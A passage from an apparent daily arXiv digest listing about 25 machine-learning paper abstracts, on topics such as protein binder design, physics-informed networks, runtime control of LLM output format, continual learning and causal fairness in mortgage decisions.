learning tasks, evaluated on benchmark datasets, confirm the effectiveness of the proposed approach.
[LG-48] Symbolic Density Estimation: A Decompositional Approach
链接: https://arxiv.org/abs/2603.27955
作者: Angelo Rajendram,Xieting Chu,Vijay Ganesh,Max Fieg,Aishik Ghosh
类目: Machine Learning (cs.LG)
*备注:
Abstract:We introduce AI-Kolmogorov, a novel framework for Symbolic Density Estimation (SymDE). Symbolic regression (SR) has been effectively used to produce interpretable models in standard regression settings but its applicability to density estimation tasks has largely been unexplored. To address the SymDE task we introduce a multi-stage pipeline: (i) problem decomposition through clustering and/or probabilistic graphical model structure learning; (ii) nonparametric density estimation; (iii) support estimation; and finally (iv) SR on the density estimate. We demonstrate the efficacy of AI-Kolmogorov on synthetic mixture models, multivariate normal distributions, and three exotic distributions, two of which are motivated by applications in high-energy physics. We show that AI-Kolmogorov can discover underlying distributions or otherwise provide valuable insight into the mathematical expressions describing them.
[LG-49] Scaling Atomistic Protein Binder Design with Generative Pretraining and Test-Time Compute ICLR2026
链接: https://arxiv.org/abs/2603.27950
作者: Kieran Didi,Zuobai Zhang,Guoqing Zhou,Danny Reidenbach,Zhonglin Cao,Sooyoung Cha,Tomas Geffner,Christian Dallago,Jian Tang,Michael M. Bronstein,Martin Steinegger,Emine Kucukbenli,Arash Vahdat,Karsten Kreis
类目: Machine Learning (cs.LG)
*备注: ICLR 2026 Oral Presentation. Project page: this https URL
Abstract:Protein interaction modeling is central to protein design, which has been transformed by machine learning with applications in drug discovery and beyond. In this landscape, structure-based de novo binder design is cast as either conditional generative modeling or sequence optimization via structure predictors (“hallucination”). We argue that this is a false dichotomy and propose Proteina-Complexa, a novel fully atomistic binder generation method unifying both paradigms. We extend recent flow-based latent protein generation architectures and leverage the domain-domain interactions of monomeric computationally predicted protein structures to construct Teddymer, a new large-scale dataset of synthetic binder-target pairs for pretraining. Combined with high-quality experimental multimers, this enables training a strong base model. We then perform inference-time optimization with this generative prior, unifying the strengths of previously distinct generative and hallucination methods. Proteina-Complexa sets a new state of the art in computational binder design benchmarks: it delivers markedly higher in-silico success rates than existing generative approaches, and our novel test-time optimization strategies greatly outperform previous hallucination methods under normalized compute budgets. We also demonstrate interface hydrogen bond optimization, fold class-guided binder generation, and extensions to small molecule targets and enzyme design tasks, again surpassing prior methods. Code, models and new data will be publicly released.
[LG-50] Deflation-PINNs: Learning Multiple Solutions for PDEs and Landau-de Gennes
链接: https://arxiv.org/abs/2603.27936
作者: Sean Disarò,Ruma Rani Maity,Aras Bacho
类目: Numerical Analysis (math.NA); Machine Learning (cs.LG)
*备注:
Abstract:Nonlinear Partial Differential Equations (PDEs) are ubiquitous in mathematical physics and engineering. Although Physics-Informed Neural Networks (PINNs) have emerged as a powerful tool for solving PDE problems, they typically struggle to identify multiple distinct solutions, since they are designed to find one solution at a time. To address this limitation, we introduce Deflation-PINNs, a novel framework that integrates a deflation loss with an architecture based on PINNs and Deep Operator Networks (DeepONets). By incorporating a deflation term into the loss function, our method systematically forces the Deflation-PINN to seek and converge upon distinct finitely many solution branches. We provide theoretical evidence on the convergence of our model and demonstrate the efficacy of Deflation-PINNs through numerical experiments on the Landau-de Gennes model of liquid crystals, a system renowned for its complex energy landscape and multiple equilibrium states. Our results show that Deflation-PINNs can successfully identify and characterize multiple distinct crystal structures.
[LG-51] Data is All You Need: Markov Chain Car-Following (MC-CF) Model
链接: https://arxiv.org/abs/2603.27909
作者: Sungyong Chung,Yanlin Zhang,Nachuan Li,Dana Monzer,Alireza Talebpour
类目: ystems and Control (eess.SY); Machine Learning (cs.LG); Robotics (cs.RO)
*备注:
Abstract:Car-following behavior is fundamental to traffic flow theory, yet traditional models often fail to capture the stochasticity of naturalistic driving. This paper introduces a new car-following modeling category called the empirical probabilistic paradigm, which bypasses conventional parametric assumptions. Within this paradigm, we propose the Markov Chain Car-Following (MC-CF) model, which represents state transitions as a Markov process and predicts behavior by randomly sampling accelerations from empirical distributions within discretized state bins. Evaluation of the MC-CF model trained on the Waymo Open Motion Dataset (WOMD) demonstrates that its variants significantly outperform physics-based models including IDM, Gipps, FVDM, and SIDM in both one-step and open-loop trajectory prediction accuracy. Statistical analysis of transition probabilities confirms that the model-generated trajectories are indistinguishable from real-world behavior, successfully reproducing the probabilistic structure of naturalistic driving across all interaction types. Zero-shot generalization on the Naturalistic Phoenix (PHX) dataset further confirms the model’s robustness. Finally, microscopic ring road simulations validate the framework’s scalability. By incrementally integrating unconstrained free-flow trajectories and high-speed freeway data (TGSIM) alongside a conservative inference strategy, the model drastically reduces collisions, achieving zero crashes in multiple equilibrium and shockwave scenarios, while successfully reproducing naturalistic and stochastic shockwave propagation. Overall, the proposed MC-CF model provides a robust, scalable, and calibration-free foundation for high-fidelity stochastic traffic modeling, uniquely suited for the data-rich future of intelligent transportation.
[LG-52] ATLAS-RTC: Closing the Loop on LLM Agent Output with Token-Level Runtime Control
链接: https://arxiv.org/abs/2603.27905
作者: Christopher Cruz
类目: Machine Learning (cs.LG)
*备注:
Abstract:We present ATLAS-RTC, a runtime control system for autoregressive language models that enforces structured output during decoding. ATLAS-RTC monitors generation at each step, detects drift from output contracts using lightweight signals, and applies targeted interventions such as biasing, masking, and rollback. Unlike post-hoc validation or static constrained decoding, it operates in a closed loop, enabling correction before errors materialize. Across structured generation and tool-calling tasks, ATLAS-RTC improves first-attempt success rates by 20 to 37.8 percentage points, with up to 88% latency reduction in failure-dominated settings. Results show that many failures arise from decoding artifacts rather than task misunderstanding, motivating runtime control as a distinct layer in LLM systems.
[LG-53] Spectral Signatures of Data Quality: Eigenvalue Tail Index as a Diagnostic for Label Noise in Neural Networks
链接: https://arxiv.org/abs/2603.27885
作者: Matthew Loftus
类目: Machine Learning (cs.LG)
*备注: 8 pages, 2 figures, 5 tables
Abstract:We investigate whether spectral properties of neural network weight matrices can predict test accuracy. Under controlled label noise variation, the tail index alpha of the eigenvalue distribution at the network’s bottleneck layer predicts test accuracy with leave-one-out R^2 = 0.984 (21 noise levels, 3 seeds per level), far exceeding all baselines: the best conventional metric (Frobenius norm of the optimal layer) achieves LOO R^2 = 0.149. This relationship holds across three architectures (MLP, CNN, ResNet-18) and two datasets (MNIST, CIFAR-10). However, under hyperparameter variation at fixed data quality (180 configurations varying width, depth, learning rate, and weight decay), all spectral and conventional measures are weak predictors (R^2 0.25), with simple baselines (global L_2 norm, LOO R^2 = 0.219) slightly outperforming spectral measures (tail alpha, LOO R^2 = 0.167). We therefore frame the tail index as a data quality diagnostic: a powerful detector of label corruption and training set degradation, rather than a universal generalization predictor. A noise detector calibrated on synthetic noise successfully identifies real human annotation errors in CIFAR-10N (9% noise detected with 3% error). We identify the information-processing bottleneck layer as the locus of this signature and connect the observations to the BBP phase transition in spiked random matrix models. We also report a negative result: the level spacing ratio r is uninformative for weight matrices due to Wishart universality.
[LG-54] Near-Optimal Primal-Dual Algorithm for Learning Linear Mixture CMDPs with Adversarial Rewards
链接: https://arxiv.org/abs/2603.27884
作者: Kihyun Yu,Seoungbin Bae,Dabeen Lee
类目: Machine Learning (cs.LG); Optimization and Control (math.OC)
*备注:
Abstract:We study safe reinforcement learning in finite-horizon linear mixture constrained Markov decision processes (CMDPs) with adversarial rewards under full-information feedback and an unknown transition kernel. We propose a primal-dual policy optimization algorithm that achieves regret and constraint violation bounds of \widetildeO(\sqrtd^2 H^3 K) under mild conditions, where d is the feature dimension, H is the horizon, and K is the number of episodes. To the best of our knowledge, this is the first provably efficient algorithm for linear mixture CMDPs with adversarial rewards. In particular, our regret bound is near-optimal, matching the known minimax lower bound up to logarithmic factors. The key idea is to introduce a regularized dual update that enables a drift-based analysis. This step is essential, as strong duality-based analysis cannot be directly applied when reward functions change across episodes. In addition, we extend weighted ridge regression-based parameter estimation to the constrained setting, allowing us to construct tighter confidence intervals that are crucial for deriving the near-optimal regret bound.
[LG-55] Stability and Sensitivity Analysis of Relative Temporal-Difference Learning: Extended Version
链接: https://arxiv.org/abs/2603.27874
作者: Masoud S. Sakha,Rushikesh Kamalapurkar,Sean Meyn
类目: Machine Learning (cs.LG); Optimization and Control (math.OC)
*备注: Extended version for submission to the 2026 IEEE CDC
Abstract:Relative temporal-difference (TD) learning was introduced to mitigate the slow convergence of TD methods when the discount factor approaches one by subtracting a baseline from the temporal-difference update. While this idea has been studied in the tabular setting, stability guarantees with function approximation remain poorly understood. This paper analyzes relative TD learning with linear function approximation. We establish stability conditions for the algorithm and show that the choice of baseline distribution plays a central role. In particular, when the baseline is chosen as the empirical distribution of the state-action process, the algorithm is stable for any non-negative baseline weight and any discount factor. We also provide a sensitivity analysis of the resulting parameter estimates, characterizing both asymptotic bias and covariance. The asymptotic covariance and asymptotic bias are shown to remain uniformly bounded as the discount factor approaches one.
[LG-56] jaxsgp4: GPU-accelerated mega-constellation propagation with batch parallelism
链接: https://arxiv.org/abs/2603.27830
作者: Charlotte Priestley,Will Handley
类目: Distributed, Parallel, and Cluster Computing (cs.DC); Earth and Planetary Astrophysics (astro-ph.EP); Instrumentation and Methods for Astrophysics (astro-ph.IM); Machine Learning (cs.LG)
*备注: 11 pages, 3 figures
Abstract:As the population of anthropogenic space objects transitions from sparse clusters to mega-constellations exceeding 100,000 satellites, traditional orbital propagation techniques face a critical bottleneck. Standard CPU-bound implementations of the Simplified General Perturbations 4 (SGP4) algorithm are less well suited to handle the requisite scale of collision avoidance and Space Situational Awareness (SSA) tasks. This paper introduces \textttjaxsgp4, an open-source high-performance reimplementation of SGP4 utilising the \textttJAX library. \textttJAX has gained traction in the landscape of computational research, offering an easy mechanism for Just-In-Time (JIT) compilation, automatic vectorisation and automatic optimisation of code for CPU, GPU and TPU hardware modalities. By refactoring the algorithm into a pure functional paradigm, we leverage these transformations to execute massively parallel propagations on modern GPUs. We demonstrate that \textttjaxsgp4 can propagate the entire Starlink constellation (9,341 satellites) each to 1,000 future time steps in under 4 ms on a single A100 GPU, representing a speedup of 1500\times over traditional C++ baselines. Furthermore, we argue that the use of 32-bit precision for SGP4 propagation tasks offers a principled trade-off, sacrificing negligible precision loss for a substantial gain in throughput on hardware accelerators.
[LG-57] RG-TTA: Regime-Guided Meta-Control for Test-Time Adaptation in Streaming Time Series
链接: https://arxiv.org/abs/2603.27814
作者: Indar Kumar,Akanksha Tiwari,Sai Krishna Jasti,Ankit Hemant Lade
类目: Machine Learning (cs.LG); Machine Learning (stat.ML)
*备注: 18 pages, 8 figures
Abstract:Test-time adaptation (TTA) enables neural forecasters to adapt to distribution shifts in streaming time series, but existing methods apply the same adaptation intensity regardless of the nature of the shift. We propose Regime-Guided Test-Time Adaptation (RG-TTA), a meta-controller that continuously modulates adaptation intensity based on distributional similarity to previously-seen regimes. Using an ensemble of Kolmogorov-Smirnov, Wasserstein-1, feature-distance, and variance-ratio metrics, RG-TTA computes a similarity score for each incoming batch and uses it to (i) smoothly scale the learning rate – more aggressive for novel distributions, conservative for familiar ones – and (ii) control gradient effort via loss-driven early stopping rather than fixed budgets, allowing the system to allocate exactly the effort each batch requires. As a supplementary mechanism, RG-TTA gates checkpoint reuse from a regime memory, loading stored specialist models only when they demonstrably outperform the current model (loss improvement = 30%). RG-TTA is model-agnostic and strategy-composable: it wraps any forecaster exposing train/predict/save/load interfaces and enhances any gradient-based TTA method. We demonstrate three compositions – RG-TTA, RG-EWC, and RG-DynaTTA – and evaluate 6 update policies (3 baselines + 3 regime-guided variants) across 4 compact architectures (GRU, iTransformer, PatchTST, DLinear), 14 datasets (6 real-world multivariate benchmarks + 8 synthetic regime scenarios), and 4 forecast horizons (96, 192, 336, 720) under a streaming evaluation protocol with 3 random seeds (672 experiments total). Regime-guided policies achieve the lowest MSE in 156 of 224 seed-averaged experiments (69.6%), with RG-EWC winning 30.4% and RG-TTA winning 29.0%. Overall, RG-TTA reduces MSE by 5.7% vs TTA while running 5.5% faster; RG-EWC reduces MSE by 14.1% vs standalone EWC.
[LG-58] AutoStan: Autonomous Bayesian Model Improvement via Predictive Feedback
链接: https://arxiv.org/abs/2603.27766
作者: Oliver Dürr
类目: Machine Learning (cs.LG); Machine Learning (stat.ML)
*备注:
Abstract:We present AutoStan, a framework in which a command-line interface (CLI) coding agent autonomously builds and iteratively improves Bayesian models written in Stan. The agent operates in a loop, writing a Stan model file, executing MCMC sampling, then deciding whether to keep or revert each change based on two complementary feedback signals: the negative log predictive density (NLPD) on held-out data and the sampler’s own diagnostics (divergences, R-hat, effective sample size). We evaluate AutoStan on five datasets with diverse modeling structures. On a synthetic regression dataset with outliers, the agent progresses from naive linear regression to a model with Student-t robustness, nonlinear heteroscedastic structure, and an explicit contamination mixture, matching or outperforming TabPFN, a state-of-the-art black-box method, while remaining fully interpretable. Across four additional experiments, the same mechanism discovers hierarchical partial pooling, varying-slope models with correlated random effects, and a Poisson attack/defense model for soccer. No search algorithm, critic module, or domain-specific instructions are needed. This is, to our knowledge, the first demonstration that a CLI coding agent can autonomously write and iteratively improve Stan code for diverse Bayesian modeling problems.
[LG-59] MTE: Effective Multimodal Graph Learning with Task-aware Modality and Topology Co-evolution
链接: https://arxiv.org/abs/2603.27723
作者: Yinlin Zhu,Xunkai Li,Di Wu,Wang Luo,Miao Hu,Di Wu
类目: Machine Learning (cs.LG)
*备注: Under Review
Abstract:Multimodal-attributed graphs (MAGs) are a fundamental data structure for multimodal graph learning (MGL), enabling both graph-centric and modality-centric tasks. However, our empirical analysis reveals inherent topology quality limitations in real-world MAGs, including noisy interactions, missing connections, and task-agnostic relational structures. A single graph derived from generic relationships is therefore unlikely to be universally optimal for diverse downstream tasks. To address this challenge, we propose Task-aware Modality and Topology co-Evolution (TMTE), a novel MGL framework that jointly and iteratively optimizes graph topology and multimodal representations toward the target task. TMTE is motivated by the bidirectional coupling between modality and topology: multimodal attributes induce relational structures, while graph topology shapes modality representations. Concretely, TMTE casts topology evolution as multi-perspective metric learning over modality embeddings with an anchor-based approximation, and formulates modality evolution as smoothness-regularized fusion with cross-modal alignment, yielding a closed-loop task-aware co-evolution process. Extensive experiments on 9 MAG datasets and 1 non-graph multimodal dataset across 6 graph-centric and modality-centric tasks show that TMTE consistently achieves state-of-the-art performance. Our code is available at this https URL.
[LG-60] Low-Rank Adaptation Reduces Catastrophic Forgetting in Sequential Transformer Encoder Fine-Tuning: Controlled Empirical Evidence and Frozen-Backbone Representation Probes
链接: https://arxiv.org/abs/2603.27707
作者: Ashish Pandey
类目: Machine Learning (cs.LG)
*备注: 14 pages, 11 figures, 4 tables. 234 experiments across BERT-base, RoBERTa-base, GPT-2. Submitted to TMLR
Abstract:Sequential fine-tuning of pretrained language encoders often overwrites previously acquired capabilities, but the forgetting behavior of parameter-efficient updates remains under-characterized. We present a controlled empirical study of Low-Rank Adaptation (LoRA) in sequential transformer encoder fine-tuning with companion representation probes that test a frozen-backbone explanation of its robustness. In five full-validation BERT-base reruns on an RTE-MRPC-CoLA-SST-2 sequence, full fine-tuning yields 19.9%+/-4.8% average forgetting, whereas standard LoRA (r=8, query/value modules) yields 0.6%+/-1.4% (paired t-test, p=0.002, Cohen’s d_s=3.12). Task-level analyses confirm this reduction is not merely an aggregate effect. Secondary experiments on RoBERTa-base show the same pattern, and the strongest EWC baseline remains at 15.5%+/-1.4% forgetting. A six-task extension reveals that low average forgetting can hide strong task-level heterogeneity. Fine-grained freezing ablations show a marked forgetting drop once frozen parameters exceed roughly 95%, with classifier-only and shallow-adapter baselines approaching LoRA. Companion task-similarity probes in GPT-2 and RoBERTa show the same directional story: frozen-backbone regimes preserve higher inter-task similarity than full fine-tuning, gradual unfreezing weakens stability, and full fine-tuning exhibits its clearest divergence at the final transformer layer. These results support a restrained mechanistic interpretation: LoRA helps largely because backbone freezing preserves a more stable shared feature scaffold. We position standard LoRA as both a strong empirical baseline for sequential encoder adaptation and a useful probe of how selective plasticity shapes interference in transformer continual learning.
[LG-61] Optimizing Coverag e and Difficulty in Reinforcement Learning for Quiz Composition
链接: https://arxiv.org/abs/2603.27695
作者: Ricardo Pedro Querido Andrade Silva,Nassim Bouarour,Dina Fettache,Sarab Boussouar,Noha Ibrahim,Sihem Amer-Yahia
类目: Machine Learning (cs.LG)
*备注:
Abstract:Quiz design is a tedious process that teachers undertake to evaluate the acquisition of knowledge by students. Our goal in this paper is to automate quiz composition from a set of multiple choice questions (MCQs). We formalize a generic sequential decision-making problem with the goal of training an agent to compose a quiz that meets the desired topic coverage and difficulty levels. We investigate DQN, SARSA and A2C/A3C, three reinforcement learning solutions to solve our problem. We run extensive experiments on synthetic and real datasets that study the ability of RL to land on the best quiz. Our results reveal subtle differences in agent behavior and in transfer learning with different data distributions and teacher goals. This was supported by our user study, paving the way for automating various teachers’ pedagogical goals.
[LG-62] CrossHGL: A Text-Free Foundation Model for Cross-Domain Heterogeneous Graph Learning
链接: https://arxiv.org/abs/2603.27685
作者: Xuanze Chen,Jiajun Zhou,Yadong Li,Shanqing Yu,Qi Xuan
类目: Machine Learning (cs.LG)
*备注:
Abstract:Heterogeneous graph representation learning (HGRL) is essential for modeling complex systems with diverse node and edge types. However, most existing methods are limited to closed-world settings with shared schemas and feature spaces, hindering cross-domain generalization. While recent graph foundation models improve transferability, they often target homogeneous graphs, rely on domain-specific schemas, or require rich textual attributes. Consequently, text-free and few-shot cross-domain HGRL remains underexplored. To address this, we propose CrossHGL, a foundation framework that preserves and transfers multi-relational structural semantics without external textual supervision. Specifically, a semantic-preserving transformation strategy homogenizes heterogeneous graphs while encoding interaction semantics into edge features. Based on this, a prompt-aware multi-domain pre-training framework with a Tri-Prompt mechanism captures transferable knowledge across feature, edge, and structure perspectives via self-supervised contrastive learning. For target-domain adaptation, we develop a parameter-efficient fine-tuning strategy that freezes the pre-trained backbone and performs few-shot classification via prompt composition and prototypical learning. Experiments on node-level and graph-level tasks show that CrossHGL consistently outperforms state-of-the-art baselines, yielding average relative improvements of 25.1% and 7.6% in Micro-F1 for node and graph classification, respectively, while remaining competitive in challenging feature-degenerated settings.
[LG-63] Prototype-Aligned Federated Soft-Prompts for Continual Web Personalization WWW2026
链接: https://arxiv.org/abs/2603.27678
作者: Canran Xiao,Liwei Hou
类目: Machine Learning (cs.LG)
*备注: Accepted by WWW 2026
Abstract:Continual web personalization is essential for engagement, yet real-world non-stationarity and privacy constraints make it hard to adapt quickly without forgetting long-term preferences. We target this gap by seeking a privacy-conscious, parameter-efficient interface that controls stability-plasticity at the user/session level while tying user memory to a shared semantic prior. We propose ProtoFed-SP, a prompt-based framework that injects dual-timescale soft prompts into a frozen backbone: a fast, sparse short-term prompt tracks session intent, while a slow long-term prompt is anchored to a small server-side prototype library that is continually refreshed via differentially private federated aggregation. Queries are routed to Top-M prototypes to compose a personalized prompt. Across eight benchmarks, ProtoFed-SP improves NDCG@10 by +2.9% and HR@10 by +2.0% over the strongest baselines, with notable gains on Amazon-Books (+5.0% NDCG vs. INFER), HM (+2.5% vs. Dual-LoRA), and Taobao (+2.2% vs. FedRAP). It also lowers forgetting (AF) and Steps-to-95% and preserves accuracy under practical DP budgets. Our contribution is a unifying, privacy-aware prompting interface with prototype anchoring that delivers robust continual personalization and offers a transparent, controllable mechanism to balance stability and plasticity in deployment.
[LG-64] On the Asymptotics of Self-Supervised Pre-training: Two-Stage M-Estimation and Representation Symmetry
链接: https://arxiv.org/abs/2603.27631
作者: Mohammad Tinati,Stephen Tu
类目: Machine Learning (cs.LG); Machine Learning (stat.ML)
*备注:
Abstract:Self-supervised pre-training, where large corpora of unlabeled data are used to learn representations for downstream fine-tuning, has become a cornerstone of modern machine learning. While a growing body of theoretical work has begun to analyze this paradigm, existing bounds leave open the question of how sharp the current rates are, and whether they accurately capture the complex interaction between pre-training and fine-tuning. In this paper, we address this gap by developing an asymptotic theory of pre-training via two-stage M-estimation. A key challenge is that the pre-training estimator is often identifiable only up to a group symmetry, a feature common in representation learning that requires careful treatment. We address this issue using tools from Riemannian geometry to study the intrinsic parameters of the pre-training representation, which we link with the downstream predictor through a notion of orbit-invariance, precisely characterizing the limiting distribution of the downstream test risk. We apply our main result to several case studies, including spectral pre-training, factor models, and Gaussian mixture models, and obtain substantial improvements in problem-specific factors over prior art when applicable.
[LG-65] RTLSeek: Boosting the LLM -Based RTL Generation with Multi-Stage Diversity-Oriented Reinforcement Learning
链接: https://arxiv.org/abs/2603.27630
作者: Xinyu Zhang,Zhiteng Chao,Yonghao Wang,Bin Sun,Tianyun Ma,Tianmeng Yang,Jianan Mu,Jing Justin Ye,Huawei Li
类目: Hardware Architecture (cs.AR); Machine Learning (cs.LG)
*备注: 8 pages, 6 figures
Abstract:Register Transfer Level (RTL) design translates high-level specifications into hardware using HDLs such as Verilog. Although LLM-based RTL generation is promising, the scarcity of functionally verifiable high-quality data limits both accuracy and diversity. Existing post-training typically produces a single HDL implementation per specification, lacking awareness of RTL variations needed for different design goals. We propose RTLSeek, a post-training paradigm that applies rule-based Diversity-Oriented Reinforcement Learning to improve RTL correctness and diversity. Our Diversity-Centric Multi-Objective Reward Scheduling integrates expert knowledge with EDA feedback, and a three-stage framework maximizes the utility of limited data. Experiments on the RTLLM benchmark show that RTLSeek surpasses prior methods, with ablation results confirming that encouraging broader design-space exploration improves RTL quality and achieves the principle of “the more generated, the better results.” Implementation framework, including the dataset, source code, and model weights, is shown at this https URL.
[LG-66] Secure Reinforcement Learning: On Model-Free Detection of Man in the Middle Attacks
链接: https://arxiv.org/abs/2603.27592
作者: Rishi Rani,Massimo Franceschetti
类目: ystems and Control (eess.SY); Machine Learning (cs.LG)
*备注:
Abstract:We consider the problem of learning-based man-in-the-middle (MITM) attacks in cyber-physical systems (CPS), and extend our previously proposed Bellman Deviation Detection (BDD) framework for model-free reinforcement learning (RL). We refine the standard MDP attack model by allowing the reward function to depend on both the current and subsequent states, thereby capturing reward variations induced by errors in the adversary’s transition estimate. We also derive an optimal system-identification strategy for the adversary that minimizes detectable value deviations. Further, we prove that the agent’s asymptotic learning time required to secure the system scales linearly with the adversary’s learning time, and that this matches the optimal lower bound. Hence, the proposed detection scheme is order-optimal in detection efficiency. Finally, we extend the framework to asynchronous and intermittent attack scenarios, where reliable detection is preserved.
[LG-67] An Energy-Efficient Spiking Neural Network Architecture for Predictive Insulin Delivery
链接: https://arxiv.org/abs/2603.27589
作者: Sahil Shrivastava
类目: Machine Learning (cs.LG)
*备注: 10 pages, 6 figures, 12 tables. IEEE conference format. Independent Research
Abstract:Diabetes mellitus affects over 537 million adults worldwide. Insulin-dependent patients require continuous glucose monitoring and precise dose calculation while operating under strict power budgets on wearable devices. This paper presents PDDS - an in-silico, software-complete research prototype of an event-driven computational pipeline for predictive insulin dose calculation. Motivated by neuromorphic computing principles for ultra-low-power wearable edge devices, the core contribution is a three-layer Leaky Integrate-and-Fire (LIF) Spiking Neural Network trained on 128,025 windows from OhioT1DM (66.5% real patients) and the FDA-accepted UVa/Padova physiological simulator (33.5%), achieving 85.90% validation accuracy. We present three rigorously honest evaluations: (1) a standard test-set comparison against ADA threshold rules, bidirectional LSTM (99.06% accuracy), and MLP (99.00%), where the SNN achieves 85.24% - we demonstrate this gap reflects the stochastic encoding trade-off, not architectural failure; (2) a temporal benchmark on 426 non-obvious clinician-annotated hypoglycemia windows where neither the SNN (9.2% recall) nor the ADA rule (16.7% recall) performs adequately, identifying the system’s key limitation and the primary direction for future work; (3) a power-efficiency analysis showing the SNN requires 79,267x less energy per inference than the LSTM (1,551 Femtojoules vs. 122.9 nanojoules), justifying the SNN architecture for continuous wearable deployment. The system is not yet connected to physical hardware; it constitutes the computational middle layer of a five phase roadmap toward clinical validation. Keywords: spiking neural network, glucose severity classification, edge computing, hypoglycemia detection, event-driven architecture, LIF neuron, Poisson encoding, OhioT1DM, in-silico, neuromorphic, power efficiency.
[LG-68] BLOSSOM: Block-wise Federated Learning Over Shared and Sparse Observed Modalities IJCNN
链接: https://arxiv.org/abs/2603.27552
作者: Pranav M R,Jayant Chandwani,Ahmed M. Abdelmoniem,Arnab K. Paul
类目: Machine Learning (cs.LG); Distributed, Parallel, and Cluster Computing (cs.DC)
*备注: 6 pages, 2 figures, 3 tables. Accepted to the International Joint Conference on Neural Networks (IJCNN) 2026
Abstract:Multimodal federated learning (FL) is essential for real-world applications such as autonomous systems and healthcare, where data is distributed across heterogeneous clients with varying and often missing modalities. However, most existing FL approaches assume uniform modality availability, limiting their applicability in practice. We introduce BLOSSOM, a task-agnostic framework for multimodal FL designed to operate under shared and sparsely observed modality conditions. BLOSSOM supports clients with arbitrary modality subsets and enables flexible sharing of model components. To address client and task heterogeneity, we propose a block-wise aggregation strategy that selectively aggregates shared components while keeping task-specific blocks private, enabling partial personalization. We evaluate BLOSSOM on multiple diverse multimodal datasets and analyse the effects of missing modalities and personalization. Our results show that block-wise personalization significantly improves performance, particularly in settings with severe modality sparsity. In modality-incomplete scenarios, BLOSSOM achieves an average performance gain of 18.7% over full-model aggregation, while in modality-exclusive settings the gain increases to 37.7%, highlighting the importance of block-wise learning for practical multimodal FL systems.
[LG-69] Visualization of Machine Learning Models through Their Spatial and Temporal Listeners
链接: https://arxiv.org/abs/2603.27527
作者: Siyu Wu,Lei Shi,Lei Xia,Cenyang Wu,Zipeng Liu,Yingchaojie Feng,Liang Zhou,Wei Chen
类目: Machine Learning (cs.LG)
*备注:
Abstract:Model visualization (ModelVis) has emerged as a major research direction, yet existing taxonomies are largely organized by data or tasks, making it difficult to treat models as first-class analysis objects. We present a model-centric two-stage framework that employs abstract listeners to capture spatial and temporal model behaviors, and then connects the translated model behavior data to the classical InfoVis pipeline. To apply the framework at scale, we build a retrieval-augmented human–large language model (LLM) extraction workflow and curate a corpus of 128 VIS/VAST ModelVis papers with 331 coded figures. Our analysis shows a dominant result-centric priority on visualizing model outcomes, quantitative/nominal data type, statistical charts, and performance evaluation. Citation-weighted trends further indicate that less frequent model-mechanism-oriented studies have disproportionately high impact while are less investigated recently. Overall, the framework is a general approach for comparing existing ModelVis systems and guiding possible future designs.
[LG-70] Q-BIOLAT: Binary Latent Protein Fitness Landscapes for QUBO-Based Optimization
链接: https://arxiv.org/abs/2603.27526
作者: Truong-Son Hy
类目: Machine Learning (cs.LG)
*备注:
Abstract:Protein fitness optimization is inherently a discrete combinatorial problem, yet most learning-based approaches rely on continuous representations and are primarily evaluated through predictive accuracy. We introduce Q-BIOLAT, a framework for modeling and optimizing protein fitness landscapes in compact binary latent spaces. Starting from pretrained protein language model embeddings, we construct binary latent representations and learn a quadratic unconstrained binary optimization (QUBO) surrogate that captures unary and pairwise interactions. Beyond its formulation, Q-BIOLAT provides a representation-centric perspective on protein fitness modeling. We show that representations with similar predictive performance can induce fundamentally different optimization landscapes. In particular, learned autoencoder-based representations collapse after binarization, producing degenerate latent spaces that fail to support combinatorial search, whereas simple structured representations such as PCA yield high-entropy, decodable, and optimization-friendly latent spaces. Across multiple datasets and data regimes, we demonstrate that classical combinatorial optimization methods, including simulated annealing, genetic algorithms, and greedy hill climbing, are highly effective in structured binary latent spaces. By expressing the objective in QUBO form, our approach connects modern machine learning with discrete and quantum-inspired optimization. Our implementation and dataset are publicly available at: this https URL Subjects: Machine Learning (cs.LG) Cite as: arXiv:2603.27526 [cs.LG] (or arXiv:2603.27526v1 [cs.LG] for this version) https://doi.org/10.48550/arXiv.2603.27526 Focus to learn more arXiv-issued DOI via DataCite Submission history From: Truong-Son Hy [view email] [v1] Sun, 29 Mar 2026 05:33:55 UTC (2,919 KB)
[LG-71] Match or Replay: Self Imitating Proximal Policy Optimization
链接: https://arxiv.org/abs/2603.27515
作者: Gaurav Chaudhary,Laxmidhar Behera,Washim Uddin Mondal
类目: Machine Learning (cs.LG)
*备注:
Abstract:Reinforcement Learning (RL) agents often struggle with inefficient exploration, particularly in environments with sparse rewards. Traditional exploration strategies can lead to slow learning and suboptimal performance because agents fail to systematically build on previously successful experiences, thereby reducing sample efficiency. To tackle this issue, we propose a self-imitating on-policy algorithm that enhances exploration and sample efficiency by leveraging past high-reward state-action pairs to guide policy updates. Our method incorporates self-imitation by using optimal transport distance in dense reward environments to prioritize state visitation distributions that match the most rewarding trajectory. In sparse-reward environments, we uniformly replay successful self-encountered trajectories to facilitate structured exploration. Experimental results across diverse environments demonstrate substantial improvements in learning efficiency, including MuJoCo for dense rewards and the partially observable 3D Animal-AI Olympics and multi-goal PointMaze for sparse rewards. Our approach achieves faster convergence and significantly higher success rates compared to state-of-the-art self-imitating RL baselines. These findings underscore the potential of self-imitation as a robust strategy for enhancing exploration in RL, with applicability to more complex tasks.
[LG-72] Decomposing Discrimination: Causal Mediation Analysis for AI-Driven Credit Decisions
链接: https://arxiv.org/abs/2603.27510
作者: Duraimurugan Rajamanickam
类目: Machine Learning (cs.LG)
*备注: 22 pages, 6 figures, 2 tables. Open-source code at this https URL
Abstract:Statistical fairness metrics in AI-driven credit decisions conflate two causally distinct mechanisms: discrimination operating directly from a protected attribute to a credit outcome, and structural inequality propagating through legitimate financial features. We formalise this distinction using Pearl’s framework of natural direct and indirect effects applied to the credit decision setting. Our primary theoretical contribution is an identification strategy for natural direct and indirect effects under treatment-induced confounding – the prevalent setting in which protected attributes causally affect both financial mediators and the final decision, violating standard sequential ignorability. We show that interventional direct and indirect effects (IDE/IIE) are identified under the weaker Modified Sequential Ignorability assumption, and prove that IDE/IIE provide conservative bounds on the unidentified natural effects under monotone indirect treatment response. We propose a doubly-robust augmented inverse probability weighted (AIPW) estimator for IDE/IIE with semiparametric efficiency properties, implemented via cross-fitting. An E-value sensitivity analysis addresses residual confounding on the direct pathway. Empirical evaluation on 89,465 real HMDA conventional purchase mortgage applications from New York State (2022) demonstrates that approximately 77% of the observed 7.9 percentage-point racial denial disparity operates through financial mediators shaped by structural inequality, while the remaining 23% constitutes a conservative lower bound on direct discrimination. The open-source CausalFair Python package implements the full pipeline for deployment at resource-constrained 